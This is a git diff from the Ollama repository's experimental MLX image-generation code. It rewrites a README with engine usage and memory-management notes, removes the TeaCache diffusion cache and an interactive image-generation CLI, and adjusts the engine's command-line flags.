-ollama run z-image "a cat playing piano"
+# Build
+go build ./cmd/engine

-# Check if model is running
-ollama ps
+# Text generation
+./engine -model ./weights/Llama-3.1-8B -prompt "Hello, world!" -max-tokens 250

-# Stop the model
-ollama stop z-image
+# Qwen-Image 2512 (text-to-image)
+./engine -qwen-image -model ./weights/Qwen-Image-2512 -prompt "A mountain landscape at sunset" \
+  -width 1024 -height 1024 -steps 20 -seed 42 -output landscape.png
+
+# Qwen-Image Edit (experimental) - 8 steps for speed, but model recommends 50
+./engine -qwen-image-edit -model ./weights/Qwen-Image-Edit-2511 \
+  -input-image input.png -prompt "Make it winter" -negative-prompt " " -cfg-scale 4.0 \
+  -steps 8 -seed 42 -output edited.png
 ```

-## API
+## Memory Management

-### OpenAI-Compatible Endpoint
+MLX Python/C++ uses scope-based memory management - arrays are freed when they go out of scope. Go's garbage collector is non-deterministic, so we can't rely on finalizers to free GPU memory promptly.

-```bash
-POST /v1/images/generations
+Instead, arrays are automatically tracked and freed on `Eval()`:
+
+```go
+// All arrays are automatically tracked when created
+x := mlx.Add(a, b)
+y := mlx.Matmul(x, w)
+
+// Eval frees non-kept arrays, evaluates outputs (auto-kept)
+mlx.Eval(y)
+
+// After copying to CPU, free the array
+data := y.Data()
+y.Free()
 ```

-**Request:**
-```json
-{
-  "model": "z-image",
-  "prompt": "a sunset over mountains",
-  "size": "1024x1024",
-  "response_format": "b64_json"
-}
-```
-
-**Response:**
-```json
-{
-  "created": 1704067200,
-  "data": [
-    {
-      "b64_json": "iVBORw0KGgo..."
-    }
-  ]
-}
-```
-
-### Example: cURL
-
-```bash
-curl http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "z-image",
-    "prompt": "a white cat",
-    "size": "1024x1024"
-  }'
-```
-
-### Example: Save to File
-
-```bash
-curl -s http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "z-image",
-    "prompt": "a white cat",
-    "size": "1024x1024"
-  }' | jq -r '.data[0].b64_json' | base64 -d > image.png
-```
-
-### Streaming Progress
-
-Enable streaming to receive progress updates via SSE:
-
-```bash
-curl http://localhost:11434/v1/images/generations \
-  -H "Content-Type: application/json" \
-  -d '{"model": "z-image", "prompt": "a sunset", "stream": true}'
-```
-
-Events:
-```
-event: progress
-data: {"step": 1, "total": 30}
-
-event: progress
-data: {"step": 2, "total": 30}
-...
-
-event: done
-data: {"created": 1704067200, "data": [{"b64_json": "..."}]}
-```
-
-## Parameters
-
-| Parameter | Type | Default | Description |
-|-----------|------|---------|-------------|
-| model | string | required | Model name |
-| prompt | string | required | Text description of image |
-| size | string | "1024x1024" | Image dimensions (WxH) |
-| n | int | 1 | Number of images (currently only 1 supported) |
-| response_format | string | "b64_json" | "b64_json" or "url" |
-| stream | bool | false | Enable progress streaming |
-
-## Requirements
-
- macOS with Apple Silicon (M1/M2/M3/M4)
- CUDA: tested on CUDA 12 Blackwell, more testing coming soon
- Sufficient VRAM (see model table above)
- Ollama built with MLX support
-
-## Limitations
-
- macOS only (uses MLX backend)
- Single image per request
- Fixed step count (30 steps)
- Modelfiles not yet supported (use `ollama create` from model directory)
-
---
-
-# Tensor Model Storage Format
-
-Tensor models store each tensor as a separate blob with metadata in the manifest. This enables faster downloads (parallel fetching) and deduplication (shared tensors are stored once).
-
-## Manifest Structure
-
-The manifest follows the standard ollama format with tensor-specific layer metadata:
-
-```json
-{
-  "schemaVersion": 2,
-  "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
-  "config": { "digest": "sha256:...", "size": 1234 },
-  "layers": [
-    {
-      "mediaType": "application/vnd.ollama.image.tensor",
-      "digest": "sha256:25b36eed...",
-      "size": 49807448,
-      "name": "text_encoder/model.layers.0.mlp.down_proj.weight",
-      "dtype": "BF16",
-      "shape": [2560, 9728]
-    },
-    {
-      "mediaType": "application/vnd.ollama.image.json",
-      "digest": "sha256:abc123...",
-      "size": 512,
-      "name": "text_encoder/config.json"
-    }
-  ]
-}
-```
-
-Each tensor layer includes:
- `name`: Path-style tensor name (e.g., `text_encoder/model.layers.0.mlp.down_proj.weight`)
- `dtype`: Data type (BF16, F32, etc.)
- `shape`: Tensor dimensions
-
-Config layers use the same path-style naming (e.g., `tokenizer/tokenizer.json`).
-
-## Blob Format
-
-Each tensor blob is a minimal safetensors file:
-
-```
-[8 bytes: header size (uint64 LE)]
-[~80 bytes: JSON header, padded to 8-byte alignment]
-[N bytes: raw tensor data]
-```
-
-Header contains a single tensor named `"data"`:
-
-```json
-{"data":{"dtype":"BF16","shape":[2560,9728],"data_offsets":[0,49807360]}}
-```
-
-## Why Include the Header?
-
-The ~88 byte safetensors header enables MLX's native `mlx_load_safetensors` function, which:
-
-1. **Uses mmap** - Maps file directly into memory, no copies
-2. **Zero-copy to GPU** - MLX reads directly from mapped pages
-3. **No custom code** - Standard MLX API, battle-tested
-
-Without the header, we'd need custom C++ code to create MLX arrays from raw mmap'd data. MLX's public API doesn't expose this - it always copies when creating arrays from external pointers.
-
-The overhead is negligible: 88 bytes per tensor = ~100KB total for a 13GB model (0.0007%).
-
-## Why Per-Tensor Blobs?
-
-**Deduplication**: Blobs are content-addressed by SHA256. If two models share identical tensors (same weights, dtype, shape), they share the same blob file.
-
-Example: Model A and Model B both use the same text encoder. The text encoder's 400 tensors are stored once, referenced by both manifests.
-
-```
-~/.ollama/models/
-  blobs/
-    sha256-25b36eed...  <- shared by both models
-    sha256-abc123...
-  manifests/
-    library/model-a/latest  <- references sha256-25b36eed
-    library/model-b/latest  <- references sha256-25b36eed
-```
-
-## Import Flow
-
-```
-cd ./weights/Z-Image-Turbo
-ollama create z-image
-
-1. Scan component directories (text_encoder/, transformer/, vae/)
-2. For each .safetensors file:
-   - Extract individual tensors
-   - Wrap each in minimal safetensors format (88B header + data)
-   - Write to blob store (SHA256 content-addressed)
-   - Add layer entry to manifest with path-style name
-3. Copy config files (*.json) as config layers
-4. Write manifest
-```
-
-## FP8 Quantization
-
-Z-Image supports FP8 quantization to reduce memory usage by ~50% while maintaining image quality.
-
-### Usage
-
-```bash
-cd ./weights/Z-Image-Turbo
-ollama create z-image-fp8 --quantize fp8
-```
-
-This quantizes weights during import. The resulting model will be ~15GB instead of ~31GB.
+Key points:

+- All created arrays are automatically tracked
+- `mlx.Eval(outputs...)` frees non-kept arrays, evaluates outputs (outputs auto-kept)
+- `mlx.Keep(arrays...)` marks arrays to survive multiple Eval cycles (for weights, caches)
+- Call `.Free()` when done with an array
--- a/x/imagegen/cache/teacache.go
+++ b/x/imagegen/cache/teacache.go
@@ -1,197 +0,0 @@
-//go:build mlx
-
-// Package cache provides caching mechanisms for diffusion model inference.
-package cache
-
-import (
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// TeaCache implements Timestep Embedding Aware Caching for diffusion models.
-// It caches the transformer output and reuses it when timestep values
-// are similar between consecutive steps.
-//
-// For CFG (classifier-free guidance), it caches pos and neg predictions
-// separately and always computes CFG fresh to avoid error amplification.
-//
-// Reference: "Timestep Embedding Tells: It's Time to Cache for Video Diffusion Model"
-// https://github.com/ali-vilab/TeaCache
-type TeaCache struct {
-	// Cached transformer output from last computed step (non-CFG mode)
-	cachedOutput *mlx.Array
-
-	// Cached CFG outputs (pos and neg separately)
-	cachedPosOutput *mlx.Array
-	cachedNegOutput *mlx.Array
-
-	// Previous timestep value for difference calculation
-	prevTimestep float32
-
-	// Accumulated difference for rescaling
-	accumulatedDiff float32
-
-	// Configuration
-	threshold      float32 // Threshold for recomputation decision
-	rescaleFactor  float32 // Model-specific rescaling factor
-	skipEarlySteps int     // Number of early steps to never cache
-
-	// Statistics
-	cacheHits   int
-	cacheMisses int
-}
-
-// TeaCacheConfig holds configuration for TeaCache.
-type TeaCacheConfig struct {
-	// Threshold for recomputation. Lower = more cache hits, potential quality loss.
-	// Recommended: 0.05-0.15 for image models
-	Threshold float32
-
-	// Rescale factor to adjust timestep embedding differences.
-	// Model-specific, typically 1.0-2.0
-	RescaleFactor float32
-
-	// SkipEarlySteps: number of early steps to always compute (never cache).
-	// Set to 2-3 for CFG mode to preserve structure. 0 = no skipping.
-	SkipEarlySteps int
-}
-
-// DefaultTeaCacheConfig returns default configuration for TeaCache.
-func DefaultTeaCacheConfig() *TeaCacheConfig {
-	return &TeaCacheConfig{
-		Threshold:     0.1,
-		RescaleFactor: 1.0,
-	}
-}
-
-// NewTeaCache creates a new TeaCache instance.
-func NewTeaCache(cfg *TeaCacheConfig) *TeaCache {
-	if cfg == nil {
-		cfg = DefaultTeaCacheConfig()
-	}
-	return &TeaCache{
-		threshold:      cfg.Threshold,
-		rescaleFactor:  cfg.RescaleFactor,
-		skipEarlySteps: cfg.SkipEarlySteps,
-	}
-}
-
-// ShouldCompute determines if we should compute the full forward pass
-// or reuse the cached output based on timestep similarity.
-//
-// Algorithm:
-// 1. First step always computes
-// 2. Subsequent steps compare |currTimestep - prevTimestep| * rescaleFactor
-// 3. If accumulated difference > threshold, compute new output
-// 4. Otherwise, reuse cached output
-func (tc *TeaCache) ShouldCompute(step int, timestep float32) bool {
-	// Always compute early steps (critical for structure)
-	// Check both regular cache and CFG cache
-	hasCachedOutput := tc.cachedOutput != nil || tc.HasCFGCache()
-	if step < tc.skipEarlySteps || step == 0 || !hasCachedOutput {
-		return true
-	}
-
-	// Compute absolute difference between current and previous timestep
-	diff := timestep - tc.prevTimestep
-	if diff < 0 {
-		diff = -diff
-	}
-
-	// Apply rescaling factor
-	scaledDiff := diff * tc.rescaleFactor
-
-	// Accumulate difference (helps track drift over multiple cached steps)
-	tc.accumulatedDiff += scaledDiff
-
-	// Decision based on accumulated difference
-	if tc.accumulatedDiff > tc.threshold {
-		tc.accumulatedDiff = 0 // Reset accumulator
-		return true
-	}
-
-	return false
-}
-
-// UpdateCache stores the computed output for potential reuse (non-CFG mode).
-func (tc *TeaCache) UpdateCache(output *mlx.Array, timestep float32) {
-	// Free previous cached output
-	if tc.cachedOutput != nil {
-		tc.cachedOutput.Free()
-	}
-
-	// Store new cached values
-	tc.cachedOutput = output
-	tc.prevTimestep = timestep
-	tc.cacheMisses++
-}
-
-// UpdateCFGCache stores pos and neg outputs separately for CFG mode.
-// This allows CFG to be computed fresh each step, avoiding error amplification.
-func (tc *TeaCache) UpdateCFGCache(posOutput, negOutput *mlx.Array, timestep float32) {
-	// Free previous cached outputs
-	if tc.cachedPosOutput != nil {
-		tc.cachedPosOutput.Free()
-	}
-	if tc.cachedNegOutput != nil {
-		tc.cachedNegOutput.Free()
-	}
-
-	// Store new cached values
-	tc.cachedPosOutput = posOutput
-	tc.cachedNegOutput = negOutput
-	tc.prevTimestep = timestep
-	tc.cacheMisses++
-}
-
-// GetCached returns the cached output (non-CFG mode).
-func (tc *TeaCache) GetCached() *mlx.Array {
-	tc.cacheHits++
-	return tc.cachedOutput
-}
-
-// GetCFGCached returns cached pos and neg outputs for CFG mode.
-func (tc *TeaCache) GetCFGCached() (pos, neg *mlx.Array) {
-	tc.cacheHits++
-	return tc.cachedPosOutput, tc.cachedNegOutput
-}
-
-// HasCFGCache returns true if CFG cache is available.
-func (tc *TeaCache) HasCFGCache() bool {
-	return tc.cachedPosOutput != nil && tc.cachedNegOutput != nil
-}
-
-// Arrays returns all arrays that should be kept alive.
-func (tc *TeaCache) Arrays() []*mlx.Array {
-	var arrays []*mlx.Array
-	if tc.cachedOutput != nil {
-		arrays = append(arrays, tc.cachedOutput)
-	}
-	if tc.cachedPosOutput != nil {
-		arrays = append(arrays, tc.cachedPosOutput)
-	}
-	if tc.cachedNegOutput != nil {
-		arrays = append(arrays, tc.cachedNegOutput)
-	}
-	return arrays
-}
-
-// Stats returns cache hit/miss statistics.
-func (tc *TeaCache) Stats() (hits, misses int) {
-	return tc.cacheHits, tc.cacheMisses
-}
-
-// Free releases all cached arrays.
-func (tc *TeaCache) Free() {
-	if tc.cachedOutput != nil {
-		tc.cachedOutput.Free()
-		tc.cachedOutput = nil
-	}
-	if tc.cachedPosOutput != nil {
-		tc.cachedPosOutput.Free()
-		tc.cachedPosOutput = nil
-	}
-	if tc.cachedNegOutput != nil {
-		tc.cachedNegOutput.Free()
-		tc.cachedNegOutput = nil
-	}
-}
--- a/x/imagegen/cli.go
+++ b/x/imagegen/cli.go
@@ -1,488 +0,0 @@
-// cli.go provides CLI commands for image generation models.
-//
-// TODO (jmorganca): Integrate these commands into cmd/cmd.go when stable.
-// Currently these are separate to keep experimental code isolated.
-
-package imagegen
-
-import (
-	"encoding/base64"
-	"errors"
-	"fmt"
-	"io"
-	"os"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/spf13/cobra"
-
-	"github.com/ollama/ollama/api"
-	"github.com/ollama/ollama/envconfig"
-	"github.com/ollama/ollama/progress"
-	"github.com/ollama/ollama/readline"
-)
-
-// ImageGenOptions holds options for image generation.
-// These can be set via environment variables or interactive commands.
-type ImageGenOptions struct {
-	Width          int
-	Height         int
-	Steps          int
-	Seed           int
-	NegativePrompt string
-}
-
-// DefaultOptions returns the default image generation options.
-func DefaultOptions() ImageGenOptions {
-	return ImageGenOptions{
-		Width:  1024,
-		Height: 1024,
-		Steps:  0, // 0 means model default
-		Seed:   0, // 0 means random
-	}
-}
-
-// RegisterFlags adds image generation flags to the given command.
-// Flags are hidden since they only apply to image generation models.
-func RegisterFlags(cmd *cobra.Command) {
-	cmd.Flags().Int("width", 1024, "Image width")
-	cmd.Flags().Int("height", 1024, "Image height")
-	cmd.Flags().Int("steps", 0, "Denoising steps (0 = model default)")
-	cmd.Flags().Int("seed", 0, "Random seed (0 for random)")
-	cmd.Flags().String("negative", "", "Negative prompt")
-	// Hide from main flags section - shown in separate section via AppendFlagsDocs
-	cmd.Flags().MarkHidden("width")
-	cmd.Flags().MarkHidden("height")
-	cmd.Flags().MarkHidden("steps")
-	cmd.Flags().MarkHidden("seed")
-	cmd.Flags().MarkHidden("negative")
-}
-
-// AppendFlagsDocs appends image generation flags documentation to the command's usage template.
-func AppendFlagsDocs(cmd *cobra.Command) {
-	usage := `
-Image Generation Flags (experimental):
-      --width int      Image width
-      --height int     Image height
-      --steps int      Denoising steps
-      --seed int       Random seed
-      --negative str   Negative prompt
-`
-	cmd.SetUsageTemplate(cmd.UsageTemplate() + usage)
-}
-
-// RunCLI handles the CLI for image generation models.
-// Returns true if it handled the request, false if the caller should continue with normal flow.
-// Supports flags: --width, --height, --steps, --seed, --negative
-func RunCLI(cmd *cobra.Command, name string, prompt string, interactive bool, keepAlive *api.Duration) error {
-	// Get options from flags (with env var defaults)
-	opts := DefaultOptions()
-	if cmd != nil && cmd.Flags() != nil {
-		if v, err := cmd.Flags().GetInt("width"); err == nil && v > 0 {
-			opts.Width = v
-		}
-		if v, err := cmd.Flags().GetInt("height"); err == nil && v > 0 {
-			opts.Height = v
-		}
-		if v, err := cmd.Flags().GetInt("steps"); err == nil && v > 0 {
-			opts.Steps = v
-		}
-		if v, err := cmd.Flags().GetInt("seed"); err == nil && v != 0 {
-			opts.Seed = v
-		}
-		if v, err := cmd.Flags().GetString("negative"); err == nil && v != "" {
-			opts.NegativePrompt = v
-		}
-	}
-
-	if interactive {
-		return runInteractive(cmd, name, keepAlive, opts)
-	}
-
-	// One-shot generation
-	return generateImageWithOptions(cmd, name, prompt, keepAlive, opts)
-}
-
-// generateImageWithOptions generates an image with the given options.
-func generateImageWithOptions(cmd *cobra.Command, modelName, prompt string, keepAlive *api.Duration, opts ImageGenOptions) error {
-	client, err := api.ClientFromEnvironment()
-	if err != nil {
-		return err
-	}
-
-	req := &api.GenerateRequest{
-		Model:  modelName,
-		Prompt: prompt,
-		Width:  int32(opts.Width),
-		Height: int32(opts.Height),
-		Steps:  int32(opts.Steps),
-	}
-	if opts.Seed != 0 {
-		req.Options = map[string]any{"seed": opts.Seed}
-	}
-	if keepAlive != nil {
-		req.KeepAlive = keepAlive
-	}
-
-	// Show loading spinner until generation starts
-	p := progress.NewProgress(os.Stderr)
-	spinner := progress.NewSpinner("")
-	p.Add("", spinner)
-
-	var stepBar *progress.StepBar
-	var imageBase64 string
-	err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
-		// Handle progress updates using structured fields
-		if resp.Total > 0 {
-			if stepBar == nil {
-				spinner.Stop()
-				stepBar = progress.NewStepBar("Generating", int(resp.Total))
-				p.Add("", stepBar)
-			}
-			stepBar.Set(int(resp.Completed))
-		}
-
-		// Handle final response with image data
-		if resp.Done && resp.Image != "" {
-			imageBase64 = resp.Image
-		}
-
-		return nil
-	})
-
-	p.StopAndClear()
-	if err != nil {
-		return err
-	}
-
-	if imageBase64 != "" {
-		// Decode base64 and save to CWD
-		imageData, err := base64.StdEncoding.DecodeString(imageBase64)
-		if err != nil {
-			return fmt.Errorf("failed to decode image: %w", err)
-		}
-
-		// Create filename from prompt
-		safeName := sanitizeFilename(prompt)
-		if len(safeName) > 50 {
-			safeName = safeName[:50]
-		}
-		timestamp := time.Now().Format("20060102-150405")
-		filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
-
-		if err := os.WriteFile(filename, imageData, 0o644); err != nil {
-			return fmt.Errorf("failed to save image: %w", err)
-		}
-
-		displayImageInTerminal(filename)
-		fmt.Printf("Image saved to: %s\n", filename)
-	}
-
-	return nil
-}
-
-// runInteractive runs an interactive REPL for image generation.
-func runInteractive(cmd *cobra.Command, modelName string, keepAlive *api.Duration, opts ImageGenOptions) error {
-	client, err := api.ClientFromEnvironment()
-	if err != nil {
-		return err
-	}
-
-	// Preload the model with the specified keepalive
-	p := progress.NewProgress(os.Stderr)
-	spinner := progress.NewSpinner("")
-	p.Add("", spinner)
-
-	preloadReq := &api.GenerateRequest{
-		Model:     modelName,
-		KeepAlive: keepAlive,
-	}
-	if err := client.Generate(cmd.Context(), preloadReq, func(resp api.GenerateResponse) error {
-		return nil
-	}); err != nil {
-		p.StopAndClear()
-		return fmt.Errorf("failed to load model: %w", err)
-	}
-	p.StopAndClear()
-
-	scanner, err := readline.New(readline.Prompt{
-		Prompt:      ">>> ",
-		Placeholder: "Describe an image to generate (/help for commands)",
-	})
-	if err != nil {
-		return err
-	}
-
-	if envconfig.NoHistory() {
-		scanner.HistoryDisable()
-	}
-
-	for {
-		line, err := scanner.Readline()
-		switch {
-		case errors.Is(err, io.EOF):
-			fmt.Println()
-			return nil
-		case errors.Is(err, readline.ErrInterrupt):
-			if line == "" {
-				fmt.Println("\nUse Ctrl + d or /bye to exit.")
-			}
-			continue
-		case err != nil:
-			return err
-		}
-
-		line = strings.TrimSpace(line)
-		if line == "" {
-			continue
-		}
-
-		// Handle commands
-		switch {
-		case strings.HasPrefix(line, "/bye"):
-			return nil
-		case strings.HasPrefix(line, "/?"), strings.HasPrefix(line, "/help"):
-			printInteractiveHelp()
-			continue
-		case strings.HasPrefix(line, "/set "):
-			if err := handleSetCommand(line[5:], &opts); err != nil {
-				fmt.Fprintf(os.Stderr, "Error: %v\n", err)
-			}
-			continue
-		case strings.HasPrefix(line, "/show"):
-			printCurrentSettings(opts)
-			continue
-		case strings.HasPrefix(line, "/"):
-			fmt.Fprintf(os.Stderr, "Unknown command: %s (try /help)\n", line)
-			continue
-		}
-
-		// Generate image with current options
-		req := &api.GenerateRequest{
-			Model:  modelName,
-			Prompt: line,
-			Width:  int32(opts.Width),
-			Height: int32(opts.Height),
-			Steps:  int32(opts.Steps),
-		}
-		if opts.Seed != 0 {
-			req.Options = map[string]any{"seed": opts.Seed}
-		}
-		if keepAlive != nil {
-			req.KeepAlive = keepAlive
-		}
-
-		// Show loading spinner until generation starts
-		p := progress.NewProgress(os.Stderr)
-		spinner := progress.NewSpinner("")
-		p.Add("", spinner)
-
-		var stepBar *progress.StepBar
-		var imageBase64 string
-
-		err = client.Generate(cmd.Context(), req, func(resp api.GenerateResponse) error {
-			// Handle progress updates using structured fields
-			if resp.Total > 0 {
-				if stepBar == nil {
-					spinner.Stop()
-					stepBar = progress.NewStepBar("Generating", int(resp.Total))
-					p.Add("", stepBar)
-				}
-				stepBar.Set(int(resp.Completed))
-			}
-
-			// Handle final response with image data
-			if resp.Done && resp.Image != "" {
-				imageBase64 = resp.Image
-			}
-
-			return nil
-		})
-
-		p.StopAndClear()
-		if err != nil {
-			fmt.Fprintf(os.Stderr, "Error: %v\n", err)
-			continue
-		}
-
-		// Save image to current directory with descriptive name
-		if imageBase64 != "" {
-			// Decode base64 image data
-			imageData, err := base64.StdEncoding.DecodeString(imageBase64)
-			if err != nil {
-				fmt.Fprintf(os.Stderr, "Error decoding image: %v\n", err)
-				continue
-			}
-
-			// Create filename from prompt (sanitized)
-			safeName := sanitizeFilename(line)
-			if len(safeName) > 50 {
-				safeName = safeName[:50]
-			}
-			timestamp := time.Now().Format("20060102-150405")
-			filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
-
-			if err := os.WriteFile(filename, imageData, 0o644); err != nil {
-				fmt.Fprintf(os.Stderr, "Error saving image: %v\n", err)
-				continue
-			}
-
-			displayImageInTerminal(filename)
-			fmt.Printf("Image saved to: %s\n", filename)
-		}
-
-		fmt.Println()
-	}
-}
-
-// sanitizeFilename removes characters that aren't safe for filenames.
-func sanitizeFilename(s string) string {
-	s = strings.ToLower(s)
-	s = strings.ReplaceAll(s, " ", "-")
-	// Remove any character that's not alphanumeric or hyphen
-	var result strings.Builder
-	for _, r := range s {
-		if (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-' {
-			result.WriteRune(r)
-		}
-	}
-	return result.String()
-}
-
-// printInteractiveHelp prints help for interactive mode commands.
-// TODO: reconcile /set commands with /set parameter in text gen REPL (cmd/cmd.go)
-func printInteractiveHelp() {
-	fmt.Fprintln(os.Stderr, "Commands:")
-	fmt.Fprintln(os.Stderr, "  /set width <n>     Set image width")
-	fmt.Fprintln(os.Stderr, "  /set height <n>    Set image height")
-	fmt.Fprintln(os.Stderr, "  /set steps <n>     Set denoising steps")
-	fmt.Fprintln(os.Stderr, "  /set seed <n>      Set random seed")
-	fmt.Fprintln(os.Stderr, "  /set negative <s>  Set negative prompt")
-	fmt.Fprintln(os.Stderr, "  /show              Show current settings")
-	fmt.Fprintln(os.Stderr, "  /bye               Exit")
-	fmt.Fprintln(os.Stderr)
-	fmt.Fprintln(os.Stderr, "Or type a prompt to generate an image.")
-	fmt.Fprintln(os.Stderr)
-}
-
-// printCurrentSettings prints the current image generation settings.
-func printCurrentSettings(opts ImageGenOptions) {
-	fmt.Fprintf(os.Stderr, "Current settings:\n")
-	fmt.Fprintf(os.Stderr, "  width:    %d\n", opts.Width)
-	fmt.Fprintf(os.Stderr, "  height:   %d\n", opts.Height)
-	fmt.Fprintf(os.Stderr, "  steps:    %d\n", opts.Steps)
-	fmt.Fprintf(os.Stderr, "  seed:     %d (0=random)\n", opts.Seed)
-	if opts.NegativePrompt != "" {
-		fmt.Fprintf(os.Stderr, "  negative: %s\n", opts.NegativePrompt)
-	}
-	fmt.Fprintln(os.Stderr)
-}
-
-// handleSetCommand handles /set commands to change options.
-func handleSetCommand(args string, opts *ImageGenOptions) error {
-	parts := strings.SplitN(args, " ", 2)
-	if len(parts) < 2 {
-		return fmt.Errorf("usage: /set <option> <value>")
-	}
-
-	key := strings.ToLower(parts[0])
-	value := strings.TrimSpace(parts[1])
-
-	switch key {
-	case "width", "w":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("width must be a positive integer")
-		}
-		opts.Width = v
-		fmt.Fprintf(os.Stderr, "Set width to %d\n", v)
-	case "height", "h":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("height must be a positive integer")
-		}
-		opts.Height = v
-		fmt.Fprintf(os.Stderr, "Set height to %d\n", v)
-	case "steps", "s":
-		v, err := strconv.Atoi(value)
-		if err != nil || v <= 0 {
-			return fmt.Errorf("steps must be a positive integer")
-		}
-		opts.Steps = v
-		fmt.Fprintf(os.Stderr, "Set steps to %d\n", v)
-	case "seed":
-		v, err := strconv.Atoi(value)
-		if err != nil {
-			return fmt.Errorf("seed must be an integer")
-		}
-		opts.Seed = v
-		fmt.Fprintf(os.Stderr, "Set seed to %d\n", v)
-	case "negative", "neg", "n":
-		opts.NegativePrompt = value
-		if value == "" {
-			fmt.Fprintln(os.Stderr, "Cleared negative prompt")
-		} else {
-			fmt.Fprintf(os.Stderr, "Set negative prompt to: %s\n", value)
-		}
-	default:
-		return fmt.Errorf("unknown option: %s (try /help)", key)
-	}
-	return nil
-}
-
-// displayImageInTerminal attempts to render an image inline in the terminal.
-// Supports iTerm2, Kitty, WezTerm, Ghostty, and other terminals with inline image support.
-// Returns true if the image was displayed, false otherwise.
-func displayImageInTerminal(imagePath string) bool {
-	// Check if terminal supports inline images
-	termProgram := os.Getenv("TERM_PROGRAM")
-	kittyWindowID := os.Getenv("KITTY_WINDOW_ID")
-	weztermPane := os.Getenv("WEZTERM_PANE")
-	ghostty := os.Getenv("GHOSTTY_RESOURCES_DIR")
-
-	// Read the image file
-	data, err := os.ReadFile(imagePath)
-	if err != nil {
-		return false
-	}
-
-	encoded := base64.StdEncoding.EncodeToString(data)
-
-	switch {
-	case termProgram == "iTerm.app" || termProgram == "WezTerm" || weztermPane != "":
-		// iTerm2/WezTerm inline image protocol
-		// ESC ] 1337 ; File = [arguments] : base64 BEL
-		fmt.Printf("\033]1337;File=inline=1;preserveAspectRatio=1:%s\a\n", encoded)
-		return true
-
-	case kittyWindowID != "" || ghostty != "" || termProgram == "ghostty":
-		// Kitty graphics protocol (also used by Ghostty)
-		// Send in chunks for large images
-		const chunkSize = 4096
-		for i := 0; i < len(encoded); i += chunkSize {
-			end := min(i+chunkSize, len(encoded))
-			chunk := encoded[i:end]
-
-			if i == 0 {
-				// First chunk: a=T (transmit), f=100 (PNG), m=1 (more chunks follow) or m=0 (last chunk)
-				more := 1
-				if end >= len(encoded) {
-					more = 0
-				}
-				fmt.Printf("\033_Ga=T,f=100,m=%d;%s\033\\", more, chunk)
-			} else if end >= len(encoded) {
-				// Last chunk
-				fmt.Printf("\033_Gm=0;%s\033\\", chunk)
-			} else {
-				// Middle chunk
-				fmt.Printf("\033_Gm=1;%s\033\\", chunk)
-			}
-		}
-		fmt.Println()
-		return true
-
-	default:
-		return false
-	}
-}
--- a/x/imagegen/cmd/engine/README.md
+++ b/x/imagegen/cmd/engine/README.md
@@ -1,35 +0,0 @@
-# MLX Engine
-
-Experimental MLX backend for running models on Apple Silicon and CUDA.
-
-## Build
-
-```bash
-go build -tags mlx -o engine ./x/imagegen/cmd/engine
-```
-
-## Text Generation
-
-```bash
-./engine -model /path/to/model -prompt "Hello" -max-tokens 100
-```
-
-Options:
-
- `-temperature` - sampling temperature (default 0.7)
- `-top-p` - nucleus sampling (default 0.9)
- `-top-k` - top-k sampling (default 40)
-
-Supports: Llama, Gemma3, GPT-OSS
-
-## Image Generation
-
-```bash
-./engine -zimage -model /path/to/z-image -prompt "a cat" -output cat.png
-```
-
-Options:
-
- `-width`, `-height` - image dimensions (default 1024x1024)
- `-steps` - denoising steps (default 9)
- `-seed` - random seed (default 42)
--- a/x/imagegen/cmd/engine/generate.go
+++ b/x/imagegen/cmd/engine/generate.go
@@ -65,12 +65,12 @@ func (s *utf8Streamer) Flush() string {
 	return result
 }

+func init() {
+	generationStream = mlx.NewStream()
+}
+
 // withStream runs fn with the generation stream as default
 func withStream(fn func()) {
-	// Lazy initialization of generationStream
-	if generationStream == nil {
-		generationStream = mlx.NewStream()
-	}
 	orig := mlx.GetDefaultStream()
 	mlx.SetDefaultStream(generationStream)
 	fn()
--- a/x/imagegen/cmd/engine/main.go
+++ b/x/imagegen/cmd/engine/main.go
@@ -7,17 +7,12 @@ import (
 	"encoding/json"
 	"flag"
 	"fmt"
-	"image"
-	_ "image/jpeg"
-	_ "image/png"
 	"log"
 	"os"
 	"path/filepath"
 	"runtime/pprof"

-	"github.com/ollama/ollama/x/imagegen"
 	"github.com/ollama/ollama/x/imagegen/mlx"
-	"github.com/ollama/ollama/x/imagegen/models/flux2"
 	"github.com/ollama/ollama/x/imagegen/models/gemma3"
 	"github.com/ollama/ollama/x/imagegen/models/gpt_oss"
 	"github.com/ollama/ollama/x/imagegen/models/llama"
@@ -51,9 +46,9 @@ func main() {
 	imagePath := flag.String("image", "", "Image path for multimodal models")

 	// Image generation params
-	width := flag.Int("width", 0, "Image width (0 = auto from input or 1024)")
-	height := flag.Int("height", 0, "Image height (0 = auto from input or 1024)")
-	steps := flag.Int("steps", 0, "Denoising steps (0 = model default)")
+	width := flag.Int("width", 1024, "Image width")
+	height := flag.Int("height", 1024, "Image height")
+	steps := flag.Int("steps", 9, "Denoising steps")
 	seed := flag.Int64("seed", 42, "Random seed")
 	out := flag.String("output", "output.png", "Output path")

@@ -66,16 +61,12 @@ func main() {

 	// Legacy mode flags
 	zimageFlag := flag.Bool("zimage", false, "Z-Image generation")
-	flux2Flag := flag.Bool("flux2", false, "FLUX.2 Klein generation")
 	qwenImage := flag.Bool("qwen-image", false, "Qwen-Image text-to-image generation")
 	qwenImageEdit := flag.Bool("qwen-image-edit", false, "Qwen-Image-Edit image editing")
 	var inputImages stringSlice
 	flag.Var(&inputImages, "input-image", "Input image for image editing (can be specified multiple times)")
 	negativePrompt := flag.String("negative-prompt", "", "Negative prompt for CFG (empty = no CFG, matching Python)")
 	cfgScale := flag.Float64("cfg-scale", 4.0, "CFG scale for image editing")
-	teaCache := flag.Bool("teacache", false, "Enable TeaCache for faster inference")
-	teaCacheThreshold := flag.Float64("teacache-threshold", 0.1, "TeaCache threshold (lower = more aggressive caching)")
-	fusedQKV := flag.Bool("fused-qkv", false, "Enable fused QKV projection for faster attention")

 	flag.Parse()

